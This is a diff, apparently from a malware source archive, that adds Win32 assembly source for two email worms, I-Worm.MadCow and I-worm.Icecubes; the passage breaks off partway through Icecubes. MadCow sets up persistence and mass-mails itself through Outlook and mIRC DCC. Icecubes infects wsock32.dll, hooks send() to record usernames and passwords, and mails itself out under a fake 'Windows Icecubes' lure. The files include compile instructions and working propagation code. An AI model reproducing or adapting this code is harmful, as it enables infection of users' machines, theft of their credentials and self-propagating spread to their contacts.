+Winini db "\\WIN.INI",00h +run db "run",00h +windows db "windows",00h +fileini db "C:\Win32\script.ini",00h +Copie3 db "C:\Win32\MadCow.exe",00h +script1 db "C:\mirc\script.ini",00h +script2 db "C:\mirc32\script.ini",00h +script3 db "C:\program files\mirc\script.ini",00h +script4 db "C:\program files\mirc32\script.ini",00h +CLE db "Software\[Atchoum]",00h +CLE2 db "\exefile\DefaultIcon",00h +Signature db "IWorm.MadCow par PetiK (c)2000" + +vbsd: +db 'DEBUT()',0dh,0ah +db 'Sub DEBUT()',0dh,0ah +db 'EMAIL()',0dh,0ah +db 'End Sub',0dh,0ah +db '',0dh,0ah +db 'Sub EMAIL()',0dh,0ah +db 'Set K = CreateObject("Outlook.Application")',0dh,0ah +db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah +db 'For Each M In L.AddressLists',0dh,0ah +db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah +db 'Set N = K.CreateItem(0)',0dh,0ah +db 'For O = 1 To M.AddressEntries.Count',0dh,0ah +db 'Set P = M.AddressEntries(O)',0dh,0ah +db 'If O = 1 Then',0dh,0ah +db 'N.BCC = P.Address',0dh,0ah +db 'Else',0dh,0ah +db 'N.BCC = N.BCC & "; " & P.Address',0dh,0ah +db 'End If',0dh,0ah +db 'Next',0dh,0ah +db 'N.Subject = "Pourquoi les vaches sont-elles folles ?"',0dh,0ah +db 'N.Body = "Voila un rapport expliquant la folie des vaches"',0dh,0ah +db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah +db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"MadCow.exe")',0dh,0ah +db 'N.Send',0dh,0ah +db 'End If',0dh,0ah +db 'Next',0dh,0ah +db 'End Sub',0dh,0ah +vbstaille equ $-vbsd + +batd: +db '@echo off',0dh,0ah +db 'start C:\Win32\ENVOIE.VBS',0dh,0ah +battaille equ $-batd + +inid: +db "[script]",0dh,0ah +db "n0=on 1:JOIN:#:{",0dh,0ah +db "n1= /if ( $nick == $me ) { halt }",0dh,0ah +db "n2= /.dcc send $nick C:\Win32\MadCow.exe",0dh,0ah +db "n3=}",00h +initaille equ $-inid + +include icone.inc + +.code +DEBUT: +VERIF: mov eax,offset CLE ; Vrifie si il existe une cl + call REG ; [Atchoum] dans HKLM\Software. + cmp [regDisp],1 ; Si elle n'y est pas, + jne INIFILE ; on installe les composants + +COPIE: push 0 ; + call GetModuleHandleA ; + push 260 ; + push offset szOrig ; + push eax ; + call GetModuleFileNameA ; Copie le fichier original + push 260 ; + push offset szCopie ; + call GetSystemDirectoryA ; dans le dossier SYSTEM + push offset Copie ; + push offset szCopie ; + call lstrcat ; sous le nom de Wininet32.exe + push 00h ; + push offset szCopie ; + push offset szOrig ; + call CopyFileA ; + push 260 ; puis + push offset szCopi2 ; + call GetWindowsDirectoryA ; nouveau dans le dossier WINDOWS + push offset Copie2 ; + push offset szCopi2 ; + call lstrcat ; sous le nom de MadCow.exe + push 00h ; + push offset szCopi2 ; + push offset szOrig ; + call CopyFileA ; + +WIN_INI:push 260 ; Pour lancer le programme, on peut + push offset szWin ; + call GetWindowsDirectoryA ; utiliser la base de registre ou le + push offset Winini ; + push offset szWin ; fichier WIN.INI dans le dossier + call lstrcat ; + push offset szWin ; WINDOWS. La dmarche est simple : + push offset szCopie ; [windows] + push offset run ; run="nom du programme" + push offset windows ; + call WritePrivateProfileStringA ; + +DIR: push 00h ; On cre ici C:\Win32 + push offset Dossier ; + call CreateDirectoryA ; +EMAIL :push 00000000h ; On va crer C:\Win32\ENVOIE.VBS + push 00000080h ; + push 00000002h ; + push 00000000h ; + push 00000001h ; + push 40000000h ; + push offset VBSFILE ; + call CreateFileA ; + mov [fh],eax ; + push 00h ; + push offset octets ; + push vbstaille ; + push offset vbsd ; + push [fh] ; + call WriteFile ; + push [fh] ; + call CloseHandle ; +EXEC :push 00000000h ; et C:\Win32\ENVOIE.BAT + push 00000080h ; + push 00000002h ; qui va xcuter ENVOIE.VBS + push 00000000h ; + push 00000001h ; + push 40000000h ; + push offset BATFILE ; + call CreateFileA ; + mov [fh],eax ; + push 00h ; + push offset octets ; + push battaille ; + push offset batd ; + push [fh] ; + call WriteFile ; + push [fh] ; + call CloseHandle ; + jmp EXECBAT ; + +REG: push offset regDisp ; + push offset regResu ; + push 0 ; + push 0F003Fh ; + push 0 ; + push 0 ; + push 0 ; + push eax ; Software\[Atchoum] + push 80000002h ; HKEY_LOCAL_MACHINE + call RegCreateKeyExA ; + push [regResu] ; met la valeur dans regResu + call RegCloseKey ; + ret ; + +INIFILE:push 00000000h ; On va crer dans C:\Win32 + push 00000001h ; + push 00000002h ; le fichier script.ini + push 00000000h ; + push 00000001h ; en lecture seul. + push 40000000h ; + push offset fileini ; + call CreateFileA ; + mov [fh],eax ; + push 00h ; + push offset octets ; + push initaille ; + push offset inid ; + push [fh] ; + call WriteFile ; + push [fh] ; + call CloseHandle ; + + push 00h ; On va copier ce fichier dans les + push offset script1 ; rpertoire suivant : + push offset fileini ; + call CopyFileA ; C:\mirc C:\mirc32 + test eax,eax ; C:\program files\mirc et dans + jnz COPYWIN ; C:\program files\mirc32 + push 00h ; + push offset script2 ; Si il arrive se copier dans un + push offset fileini ; de ces fichier, il va crer une + call CopyFileA ; copie du programme dans C:\Win32 + test eax,eax ; le nom MadCow.exe + jnz COPYWIN ; + push 00h ; + push offset script3 ; + push offset fileini ; + call CopyFileA ; + test eax,eax ; + jnz COPYWIN ; + push 00h ; + push offset script4 ; + push offset fileini ; + call CopyFileA ; + test eax,eax ; + jz ICOFILE ; + +COPYWIN:push 0 ; + call GetModuleHandleA ; + push 260 ; + push offset szOrig2 ; + push eax ; + call GetModuleFileNameA ; Copie le fichier original + push 00h ; + push offset Copie3 ; + push offset szOrig2 ; + call CopyFileA ; + jmp FIN ; + +ICOFILE:push 00000000h ; On va crer la base du disque + push 00000080h ; + push 00000002h ; dur le fichier Salut.ico + push 00000000h ; + push 00000001h ; + push 40000000h ; + push offset fichier ; + call CreateFileA ; + mov [fh],eax ; + push 00h ; + push offset octets ; + push icotaille ; + push offset icod ; + push [fh] ; + call WriteFile ; + push [fh] ; + call CloseHandle ; + push 260 ; On dplace le fichier Salut.ico + push offset szCico ; + call GetSystemDirectoryA ; dans le dossier SYSTEM sous + push offset Copico ; + push offset szCico ; MSLS.ICO + call lstrcat ; + push offset szCico ; + push offset fichier ; + call MoveFileA ; => c'est fait + +REG2: push offset l ; + push offset p ; + push 0 ; + push 1F0000h + 1 + 2h ; + push 0 ; + push 0 ; + push 0 ; + push offset CLE2 ; Run + push 80000000h ; HKEY_CLASSES_ROOT + call RegCreateKeyExA ; + push 05h ; + push offset szCico ; %system%\MSLS.ico + push 01h ; + push 0 ; + push 00h ; VALEUR PAR DEFAUT + push p ; + call RegSetValueExA ; CREE UN REGISTRE + push 0 ; + call RegCloseKey ; FERME LA BASE DE REGISTRE + jmp FIN ; PUIS TERMINE LE PROGRAMME + +EXECBAT:push 01h ; On xcute le fichier ENVOIE.BAT + push offset BATFILE ; + call WinExec ; +FIN: push 00h ; FIN DU PROGRAMME + call ExitProcess ; + +end DEBUT + +************************************************************************* + +comment * + +ICONE.INC pour I-Worm.MadCow +CE FICHIER EST LA FORME HEXADECIMAL DE L'ICONE QUE L'ON VEUT CREER +* + +icod: +db 000h,000h,001h,000h,001h,000h,010h,010h,010h,000h,000h,000h,000h,000h +db 028h,001h,000h,000h,016h,000h,000h,000h,028h,000h,000h,000h,010h,000h +db 000h,000h,020h,000h,000h,000h,001h,000h,004h,000h,000h,000h,000h,000h +db 0C0h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,010h,000h +db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,080h,000h +db 000h,080h,000h,000h,000h,080h,080h,000h,080h,000h,000h,000h,080h,000h +db 080h,000h,080h,080h,000h,000h,0C0h,0C0h,0C0h,000h,080h,080h,080h,000h +db 000h,000h,0FFh,000h,000h,0FFh,000h,000h,000h,0FFh,0FFh,000h,0FFh,000h +db 000h,000h,0FFh,000h,0FFh,000h,0FFh,0FFh,000h,000h,0FFh,0FFh,0FFh,000h +db 0FFh,0FFh,0FFh,0FFh,0FFh,0FFh,0FFh,0FFh,0F0h,000h,000h,000h,000h,000h +db 000h,00Fh,0F0h,000h,000h,000h,000h,000h,000h,00Fh,0F0h,000h,000h,00Fh +db 0FFh,000h,000h,00Fh,0F0h,000h,000h,0F0h,000h,0F0h,000h,00Fh,0F0h,000h +db 000h,0F0h,000h,0F0h,000h,00Fh,0F0h,000h,00Fh,000h,000h,00Fh,000h,00Fh +db 0F0h,000h,00Fh,000h,00Fh,00Fh,000h,00Fh,0F0h,000h,0F0h,0FFh,000h,0F0h +db 0F0h,00Fh,0F0h,000h,0F0h,000h,000h,000h,0F0h,00Fh,0F0h,000h,00Fh,000h +db 000h,00Fh,000h,00Fh,0F0h,000h,00Fh,0FFh,0FFh,0FFh,000h,00Fh,0F0h,000h +db 0F0h,000h,000h,000h,0F0h,00Fh,0F0h,000h,00Fh,000h,000h,00Fh,000h,00Fh +db 0F0h,000h,000h,000h,000h,000h,000h,00Fh,0FFh,0FFh,0FFh,0FFh,0FFh,0FFh +db 0FFh,0FFh,000h,000h,0FFh,0FFh,07Fh,0FEh,0FFh,0FFh,07Fh,0FEh,0FFh,0FFh +db 07Eh,03Eh,0FFh,0FFh,07Dh,0DEh,0FFh,0FFh,07Dh,0DEh,0FFh,0FFh,07Bh,0EEh +db 0FFh,0FFh,07Bh,0AEh,0FFh,0FFh,074h,0D6h,0FFh,0FFh,077h,0F6h,0FFh,0FFh +db 07Bh,0EEh,0FFh,0FFh,078h,00Eh,0FFh,0FFh,077h,0F6h,0FFh,0FFh,07Bh,0EEh +db 0FFh,0FFh,07Fh,0FEh,0FFh,0FFh,000h,000h,0FFh,0FFh +icotaille equ $-icod diff --git a/Win32/I-worm.Icecubes.asm b/Win32/I-worm.Icecubes.asm new file mode 100644 index 00000000..3f70ec2a --- /dev/null +++ b/Win32/I-worm.Icecubes.asm @@ -0,0 +1,4982 @@ +;****************************************************************************; +;----------------------------------------------------------------------------; +; I-worm.Icecubes v 1.05 +; written by f0re +;----------------------------------------------------------------------------; +;============================================================================; +; +; ABOUT +; ----- +; +; Welcome to the sourcecode of my first i-worm. I have given this worm its +; name, i-worm.Icecubes, because of two reasons. First of all, here where +; i live the summer is coming..and i like icecubes in my drinks :). +; Secondly it is because of the joke behind the worm host code; when a user +; receives the worm in his mailbox, the emailmessage looks like this: +; +; Subject: Fw: Windows Icecubes ! +; +; ----- Original Message ----- +; +; >Look at what I found on the web. This tool scans your system for hidden +; >Windows settings. +; >These settings, which are better known as the "Windows Icecubes", were +; >built in Windows by +; >the programmers at Microsoft and were supposed to be kept secret. +; > +; >Just take a look, cause I think you might want to make some changes ;). +; > +; +; +; EXECUTION +; --------- +; +; When the worm is executed it will first check whether it is being executed +; under win 95/98. If any other version of windows is found, it will skip the +; infection procedure and run the worm-host code immediately. +; +; If windows 95/98 is detected it will try to locate the wsock32.dll and copy it +; to wsock32.inf. It also copies itself to the windows system directory under +; the name wsock2.dll. Then it will add the worm code to the .inf file by +; increasing the size of the last section. +; Next the worm will point the send api address in the wsock32.inf export table +; to the virus code. Finally the worm drops a wininit.ini file in the windir +; to direct windows at the next reboot to overwrite the original wsock32.dll +; with the infected wsock32.inf. +; +; Then the worm will execute the worm host code; a progressbar followed by +; funny dialog (check it out for yourself :). +; +; +; SEND HOOK +; --------- +; +; Once the wsock32.dll api-hook-routine receives control it will scan the send +; buffer for usernames and or passwords. If these are found, they are stored in the +; file \icecube.txt. If an email is being sended, the worm will extract the +; recipient(s) emailaddress(es), the from emailaddres, the recipient(s) name(s) +; and the from-name. Next it will base64 encode the host-worm file (wsock2.dll) and +; prepare a new email with the encoded host attached. The body of the email contains +; the text as shown in the ABOUT section of this description. This new email will +; be send after the original email has been send (this is also known as the +; happy99 technique). +; +; +; THANKS +; ------ +; +; I'd like to thank the following persons who helped me with my many +; questions: BlackJack, MrSandman, Spo0ky, Darkman, Benny, Prizzy, +; urgo32, Lifewire, dageshi and T-2000. +; +; +;****************************************************************************; +; +; To compile: +; +; tasm32 icecubes.asm /ml /m +; tlink32 -aa icecubes.obj import32.lib +; +; brcc32 icecubes.rc +; brc32.exe icecubes.res +; +;****************************************************************************; + +.386 +.model flat, stdcall + +locals +jumps + extrn ExitProcess:PROC + extrn DialogBoxParamA:PROC + extrn GetModuleHandleA:PROC + extrn EndDialog:PROC + extrn GetWindowRect:PROC + extrn GetDesktopWindow:PROC + extrn MoveWindow:PROC + extrn CreateThread:PROC + extrn SendDlgItemMessageA:PROC + extrn SetDlgItemTextA:PROC + extrn CloseHandle:PROC + extrn GetDlgItemTextA:PROC + extrn GetModuleHandleA:PROC + extrn GetVersion:PROC + +.data + + Start: + xor ebp, ebp + + CheckWindowsVersion: + call GetVersion + or eax, eax + jz ReturnToWormHost + + MainRoutines: + pushad + call GET_GETPROCADDRESS_API_ADDRESS + call GET_WINDIR + call GET_SYSDIR + call INFECT_WSOCK + call COPY_HOST_FILE + popad + + ReturnToWormHost: + jmp OriginalHost + +;==============================[ includes ]==================================; + + include windows.inc + include wsocks.inc + include myinc.inc + +;=============================[ ic-data.inc ]===============================; + +; get_gpa.inc data + kernel32address dd 0BFF70000h + numberofnames dd ? + addressoffunctions dd ? + addressofnames dd ? + addressofordinals dd ? + AONindex dd ? + AGetProcAddress db "GetProcAddress", 0 + AGetProcAddressA dd 0 + +; directory.inc data + currentdir db 100h dup(0) + sysdir db 100h dup(0) + windir db 100h dup(0) + AGetSystemDirectory db "GetSystemDirectoryA",0 + AGetWindowsDirectory db "GetWindowsDirectoryA",0 + ASetCurrentDirectory db "SetCurrentDirectoryA",0 + +; infect_wsock.inc + wsock32dll db "Wsock32.dll",0 + wsock32inf db "Wsock32.inf",0 + ACopyFile db "CopyFileA",0 + infectionflag db 0 + AFindFirstFile db "FindFirstFileA",0 + myfinddata WIN32_FIND_DATA <> + filesize dd 0 + memory dd 0 + ADeleteFile db "DeleteFileA",0 + +; infect_file.inc + ASetFileAttributes db "SetFileAttributesA",0 + ACreateFile db "CreateFileA",0 + ACreateFileMapping db "CreateFileMappingA",0 + AMapViewOfFile db "MapViewOfFile",0 + filehandle dd 0 + maphandle dd 0 + mapaddress dd 0 + PEheader dd 0 + imagebase dd 0 + imagesize dd 0 + wnewapiaddress dd 0 + AUnmapViewOfFile db "UnmapViewOfFile",0 + ACloseHandle db "CloseHandle",0 + ASetFilePointer db "SetFilePointer",0 + ASetEndOfFile db "SetEndOfFile",0 + ASetFileTime db "SetFileTime",0 + +; hook_api.inc + woldapiaddress dd 0 + +; rva_to_raw.inc + rva2raw dd 0 + +; get_api.inc + user32address dd 0 + wsock32address dd 0 + +; create_ini_file.inc + inifile db "wininit.ini",0 + writtensize dw 0 + inicrlf db 0dh,0ah,0 + rename db "[rename]",13,10 + slashsign db "\",0 + equalsign db "=",0 + writtenbytes dd 0 + AWriteFile db "WriteFile",0 + +; ws_copy_host_file + AGetModuleFileName db "GetModuleFileNameA",0 + +; get_bases.inc + ALoadLibrary db "LoadLibraryA",0 + k32 db "KERNEL32.dll",0 + user32 db "USER32.dll",0 + wsock32 db "WSOCK32.dll",0 + +; host_code.inc + dlgrect RECT <> + desktoprect RECT <> + dlgwidth dd 0 + dlgheight dd 0 + threadid dd 0 + initflag dd 0 + okflag dd 0 + flag dd 0 + pastvalue dd 0 + currentvalue db '2',0 + doneflag dd 0 + value11 db "Days",0 + value12 db "Weeks",0 + value13 db "Months",0 + value14 db "Years",0 + value3 db "5000",0 + value4 db "17",0 + +; ic.asm + hInst dd 0 + +; write_to_file.inc + passwordfile db "icecube.txt",0 + +; ws_intercept.inc + socketh dd 0 + status db 0 + AGlobalAlloc db "GlobalAlloc",0 + fromaddress dd 0 + fromsize dd 0 + rcptnumber dd 0 + rcpt_buffer_address dd 0 + rcpt_size_address dd 0 + totalrcptsize dd 0 + fromtag db 'From:',0 + totag db 'To:',0 + mimeendtag db '>',0 + mimefrom_address dd 0 + mimefromsize dd 0 + fromstatus db 0 + tostatus db 0 + toendtag db 'Subject:',0 + mimetosize dd 0 + mimeto_address dd 0 + +; ws_b64_encoder.inc + encTable db 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuv' + db 'wxyz0123456789+/' +; ws_attachment + wsock2 db "Wsock2.dll",0 + smHnd dd 0 + dmHnd dd 0 + bytesread dd 0 + encodedsize dd 0 + AReadFile db "ReadFile",0 + AGetFileSize db "GetFileSize",0 + +; ws_send_mail + email_buffer_address dd 0 + email_size dd 0 + datatag db 'DATA',0dh,0ah + emailid db 'Message-ID: ',0dh,0ah + emailstart db 'Subject: Fw: Windows Icecubes !',0dh,0ah + db 'MIME-Version: 1.0',0dh,0ah + db 'Content-Type: multipart/mixed; boundary="a1234"',0dh,0ah + db 0dh,0ah,'--a1234',0dh,0ah + db 'Content-Type: text/plain; charset=us-ascii',0dh,0ah + db 'Content-Transfer-Encoding: 7bit',0dh,0ah,0dh,0ah + db 0dh,0ah + db '----- Original Message -----', 0dh,0ah + db 0dh,0ah + db '>Look at what I found on the web. This tool scans your system for hidden Windows settings.', 0dh, 0ah + db '>These settings, which are better known as the "Windows Icecubes", were built in Windows by', 0dh,0ah + db '>the programmers at Microsoft and were supposed to be kept secret. ',0dh,0ah + db '>',0dh,0ah + db '>Just take a look, cause I think you might want to make some changes ;).',0dh,0ah + db '>',0dh,0ah + db 0dh,0ah + db 0dh,0ah,'--a1234',0dh,0ah + db 'Content-Type: application/octet-stream; name="Icecubes.exe"' + db 0dh,0ah,'Content-Transfer-Encoding: base64',0dh,0ah + db 'Content-Disposition: attachment; filename="Icecubes.exe"',0dh,0ah,0dh,0ah + emailend db 0dh,0ah + emailtail db 0dh,0ah,0dh,0ah,'--a1234--',0dh,0ah,0dh,0ah + endtag db 0Dh,0Ah,2Eh,0Dh,0Ah + timedate SYSTEMTIME <> + AMessageBox db "MessageBoxA",0 + AGetSystemTime db "GetSystemTime",0 + msgmessage db "Windows detected icecubes on your harddrive.",10,13 + db "This may cause the system to stop responding.",10,13 + db "Do you want Windows to remove all icecubes ?",0 + windowtitle db "I-worm.Icecubes / f0re",0 + ASend db "send",0 + ARecv db "recv",0 + recvbuffer db 100h dup(0) + +;============================[ ic-get_gpa.inc ]=============================; + +GET_GETPROCADDRESS_API_ADDRESS proc + + LoadExportTableData: + mov edi, [ebp + kernel32address] ; get exporttable + add edi, [edi + 3ch] ; address from + mov esi, [edi + 78h] ; kernel's PE header + add esi, [ebp + kernel32address] + + mov eax, dword ptr [esi + 18h] + mov [ebp + numberofnames], eax ; save number of names + + mov eax, dword ptr [esi + 1Ch] ; get ra of table with + add eax, [ebp + kernel32address] ; pointers to funtion + mov [ebp + addressoffunctions], eax ; addresses + + mov eax, dword ptr [esi + 20h] ; get ra of table with + add eax, [ebp + kernel32address] ; pointers to names + mov [ebp + addressofnames], eax ; of functions + + mov eax, dword ptr [esi + 24h] ; get ra of table with + add eax, [ebp + kernel32address] ; pointers to ordinals + mov [ebp + addressofordinals], eax ; of functions + + BeginProcAddressSearch: + mov esi, [ebp + addressofnames] ; search for GetProc + mov [ebp + AONindex], esi ; Address API in names + mov edi, [esi] ; table + add edi, [ebp + kernel32address] + xor ecx, ecx + lea ebx, [ebp + AGetProcAddress] + + TryAgain: + mov esi, ebx + + MatchByte: + cmpsb + jne NextOne + cmp byte ptr [esi], 0 ; did the entire string + je GotIt ; match ? + jmp MatchByte + + NextOne: + inc cx + add dword ptr [ebp + AONindex], 4 ; get next namepointer + mov esi, [ebp + AONindex] ; in table (4 dwords) + mov edi, [esi] + add edi, [ebp + kernel32address] ; align with kernelbase + jmp TryAgain + + GotIt: + shl ecx, 1 + mov esi, [ebp + addressofordinals] ; ordinal = nameindex * + add esi, ecx ; size of ordinal entry + xor eax, eax ; + ordinal table base + mov ax, word ptr [esi] + shl eax, 2 ; address of function = + mov esi, [ebp + addressoffunctions] ; ordinal * size of + add esi, eax ; entry of address + mov edi, dword ptr [esi] ; table + base of + add edi, [ebp + kernel32address] ; addresstable + mov [ebp + AGetProcAddressA], edi ; save GPA address + ret + +GET_GETPROCADDRESS_API_ADDRESS endp + +;===========================[ ic-get_bases.inc ]============================; + +GET_WSOCK32_BASE_ADDRESS proc + + LoadWsock32: + lea eax, [ebp + wsock32] ; not found, then + push eax ; load the dll + lea eax, [ebp + ALoadLibrary] ; first + call GETAPI + mov [ebp + wsock32address], eax + ret + +GET_WSOCK32_BASE_ADDRESS endp + +GET_USER32_BASE_ADDRESS proc + + GetUser32Base: + lea eax, [ebp + user32] + push eax + lea eax, [ebp + ALoadLibrary] + call GETAPI + mov [ebp + user32address], eax + ret + +GET_USER32_BASE_ADDRESS endp + +;============================[ ic-get_api.inc ]=============================; + +GETAPI proc + + push eax + push dword ptr [ebp + kernel32address] ; load kernelbase + call [ebp + AGetProcAddressA] ; and get api address + jmp eax ; call the api + ret ; return + +GETAPI endp + +GETUAPI proc + + push eax + push dword ptr [ebp + user32address] ; load wsockbase + call [ebp + AGetProcAddressA] ; and get api address + jmp eax + ret + +GETUAPI endp + +GETWAPI proc + + push eax + push dword ptr [ebp + wsock32address] ; load wsockbase + call [ebp + AGetProcAddressA] ; and get api address + jmp eax + ret + +GETWAPI endp + +;==========================[ ic-directory.inc ]=============================; + +GET_WINDIR proc + + GetWindowsDir: + push 128h ; size of dirstring + lea eax, [ebp + windir] ; save it here + push eax + lea eax, [ebp + AGetWindowsDirectory] ; get windowsdir + call GETAPI + ret + +GET_WINDIR endp + +GET_SYSDIR proc + + GetSystemDir: + push 128h ; size of dirstring + lea eax, [ebp + sysdir] ; save it here + push eax + lea eax, [ebp + AGetSystemDirectory] ; get system dir + call GETAPI + ret + +GET_SYSDIR endp + +SET_WINDIR proc + + SetWindowsDir: + lea eax, [ebp + windir] ; change to sysdir + push eax + lea eax, [ebp + ASetCurrentDirectory] + call GETAPI + ret + +SET_WINDIR endp + +SET_SYSDIR proc + + SetSystemDir: + lea eax, [ebp + sysdir] ; change to sysdir + push eax + lea eax, [ebp + ASetCurrentDirectory] + call GETAPI + ret + +SET_SYSDIR endp + +;=========================[ ic-infect_wsock.inc ]===========================; + +INFECT_WSOCK proc + + WsockSetSystemDirectory: + call SET_SYSDIR + + CopyWSockFile: + push 00h + lea eax, [ebp + wsock32inf] + push eax + lea eax, [ebp + wsock32dll] + push eax + lea eax, [ebp + ACopyFile] + call GETAPI + + SearchWsockFile: + mov [ebp + infectionflag], 00h + lea eax, [ebp + myfinddata] ; win32 finddata structure + push eax + lea eax, [ebp + wsock32inf] ; get wsock32.inf + push eax + lea eax, [ebp + AFindFirstFile] ; find the first file + call GETAPI + cmp eax, 0FFFFFFFh + je WsockEndSearch + + GoInfectWsockInf: + mov ecx, [ebp + myfinddata.fd_nFileSizeLow] ; ecx = filesize + mov [ebp + filesize], ecx ; save the filesize + add ecx, Leap - Start + 1000h ; filesize + virus + mov [ebp + memory], ecx ; + workspace = memory + call INFECT_FILE + cmp [ebp + infectionflag], 01 + je DeleteWsockFile + + call CREATE_INI_FILE + jmp WsockEndSearch + + DeleteWsockFile: + lea eax, [ebp + wsock32inf] + push eax + lea eax, [ebp + ADeleteFile] + call GETAPI + + DeleteIniFile2: + call SET_WINDIR + lea eax, [ebp + inifile] + push eax + lea eax, [ebp + ADeleteFile] + call GETAPI + + WsockEndSearch: + ret + +INFECT_WSOCK endp + +;=========================[ ic-infect_file.inc ]============================; + +INFECT_FILE proc + + SetAttributesToNormal: + push 80h + lea esi, [ebp + myfinddata.fd_cFileName] ; esi = filename + push esi + lea eax, [ebp + ASetFileAttributes] + call GETAPI + + OpenFile: + push 0 ; template handle=0 + push 20h ; attributes=any file + push 3 ; type= existing file + push 0 ; security option = 0 + push 1 ; shared for read + push 80000000h or 40000000h ; generic read write + push esi ; offset file name + lea eax, [ebp + ACreateFile] + call GETAPI + + cmp eax, 0FFFFFFFFh + je InfectionError + mov [ebp + filehandle], eax + +;-------------------------------[ map file ]---------------------------------; + + CreateFileMapping: ; allocates the memory + push 0 ; filename handle = 0 + push dword ptr [ebp + memory] ; max size = memory + push 0 ; minumum size = 0 + push 4 ; read / write access + push 0 ; sec. attrbs= default + push dword ptr [ebp + filehandle] + lea eax, [ebp + ACreateFileMapping] + call GETAPI ; eax = new map handle + + mov [ebp + maphandle], eax + or eax, eax + jz CloseFile + + MapViewOfFile: + push dword ptr [ebp + memory] ; memory to map + push 0 ; file offset + push 0 ; file offset + push 2 ; file map write mode + push eax ; file map handle + lea eax, [ebp + AMapViewOfFile] ; ok map the file + call GETAPI + + or eax, eax + jz CloseMap + mov esi, eax ; esi= base of map + mov [ebp + mapaddress], esi ; save that base + + DoSomeChecks: + cmp word ptr [esi], 'ZM' ; an exe file? + jne UnmapView + cmp word ptr [esi + 38h], 'll' ; already infected? + jne OkGo + mov [ebp + infectionflag], 1 ; set infectionflag + jmp UnmapView + + OkGo: + mov ebx, dword ptr [esi + 3ch] + cmp ebx, 200h + ja UnmapView + add ebx, esi + cmp dword ptr [ebx], 'EP' ; is it a PE file ? + jne UnmapView + + mov [ebp + PEheader], ebx ; save ra PE header + mov esi, ebx + mov eax, [esi + 34h] + mov [ebp + imagebase], eax ; save imagebase + +;------------------------------[ append section ]----------------------------; + + LocateBeginOfLastSection: + movzx ebx, word ptr [esi + 20d] ; optional header size + add ebx, 24d ; file header size + movzx eax, word ptr [esi + 6h] ; no of sections + dec eax ; (we want the last-1 + mov ecx, 28h ; sectionheader) + mul ecx ; * header size + add esi, ebx ; esi = begin of last + add esi, eax ; section's header + + ChangeLastSectionHeader: + or dword ptr [esi + 24h], 00000020h or 20000000h or 80000000h + + NewAlignedPhysicalSize: + mov eax, dword ptr [esi + 10h] ; old phys size + push eax ; save it + + add eax, Leap-Start + mov ecx, [ebp + PEheader] + mov ecx, [ecx + 38h] + div ecx ; and align it to + inc eax ; the sectionalign + mul ecx + mov dword ptr [esi + 10h], eax ; save it + + VirtualSizeCheck: + mov edi, dword ptr [esi + 8h] ; get old + cmp eax, edi ; virtualsize + jge NewVirtualSize + + VirtualSizeIsVirtual: + add edi, Leap-Start + mov eax, edi + mov ecx, [ebp + PEheader] + mov ecx, [ecx + 38h] + div ecx ; and align it to + inc eax ; the sectionalign + mul ecx + + NewVirtualSize: + mov [esi + 8h], eax ; save new value + + NewAlignedImageSize: + mov eax, dword ptr [esi + 0ch] ; get virtual offset + add eax, dword ptr [esi + 8h] ; + new virtual size + mov [ebp + imagesize], eax ; = new imagesize + + NewAlignedFileSize: + mov eax, dword ptr [esi + 10h] ; get new phys size + add eax, dword ptr [esi + 14h] ; add offset of phys + mov ecx, [ebp + PEheader] + mov ecx, [ecx + 3ch] + div ecx ; and align it to + inc eax ; the filealign + mul ecx + mov [ebp + filesize], eax ; size = filesize + + CalculateNewWsockApiAddress: + pop eax + push eax + add eax, dword ptr [esi + 0ch] ; + virtual offset + add eax, InterceptWsockApiCall - Start ; + ip + mov [ebp + wnewapiaddress], eax ; new api address + jmp HookDaApi + + HookDaApi: + push esi + call HOOK_API + pop esi + + CopyVirusToEndOfFile: + pop eax + mov edi, eax + add edi, [ebp + mapaddress] ; mapaddress + add edi, [esi + 14h] ; add raw data offset + lea esi, [ebp + Start] ; copy virus + mov ecx, (Leap-Start)/4 + 4 + cld + rep movsd + + UpdatePEHeaderWithChanges: + mov esi, [ebp + mapaddress] + mov word ptr [esi + 38h], 'll' ; set infectionmark + mov esi, [ebp + PEheader] + mov eax, [ebp + imagesize] + mov [esi + 50h], eax ; set new imagesize + +;--------------------------------[ unmap file ]------------------------------; + + UnmapView: + push dword ptr [ebp + mapaddress] + lea eax, [ebp + AUnmapViewOfFile] + call GETAPI + + CloseMap: + push dword ptr [ebp + maphandle] + lea eax, [ebp + ACloseHandle] + call GETAPI + + push 0 + push 0 + push dword ptr [ebp + filesize] + push dword ptr [ebp + filehandle] + lea eax, [ebp + ASetFilePointer] + call GETAPI + + push dword ptr [ebp + filehandle] + lea eax, [ebp + ASetEndOfFile] + call GETAPI + +;--------------------------------[ close file ]------------------------------; + + CloseFile: + push dword ptr [ebp + myfinddata.fd_ftLastWriteTime] + push dword ptr [ebp + myfinddata.fd_ftLastAccessTime] + push dword ptr [ebp + myfinddata.fd_ftCreationTime] + push dword ptr [ebp + filehandle] + lea eax, [ebp + ASetFileTime] + call GETAPI + + push [ebp + filehandle] + lea eax, [ebp + ACloseHandle] + call GETAPI + + InfectionError: + push dword ptr [ebp + myfinddata.fd_dwFileAttributes] + lea eax, [ebp + myfinddata.fd_cFileName] + push eax + lea eax, [ebp + ASetFileAttributes] + call GETAPI + ret + +INFECT_FILE endp + +;===========================[ ic-hook_api.inc ]=============================; + +HOOK_API proc + + LoadWSockExportTableData: + mov edi, [ebp + PEheader] + mov esi, dword ptr [edi + 78h] ; rva export table + + mov edx, esi ; get RVA + call RVA_TO_RAW + mov esi, ecx + mov eax, dword ptr [esi + 18h] + mov [ebp + numberofnames], eax ; save number of names + + push esi + mov eax, dword ptr [esi + 1Ch] ; get ra of table with + + mov edx, eax + call RVA_TO_RAW + mov eax, ecx ; pointers to funtion + mov [ebp + addressoffunctions], eax ; addresses + + pop esi + push esi + mov eax, dword ptr [esi + 20h] ; get ra of table with + + mov edx, eax + call RVA_TO_RAW + mov eax, ecx ; pointers to names + mov [ebp+addressofnames], eax ; of functions + + pop esi + push esi + + mov eax, dword ptr [esi + 24h] ; get ra of table with + mov edx, eax + call RVA_TO_RAW + mov eax, ecx ; pointers to ordinals + mov [ebp+addressofordinals], eax ; of functions + pop 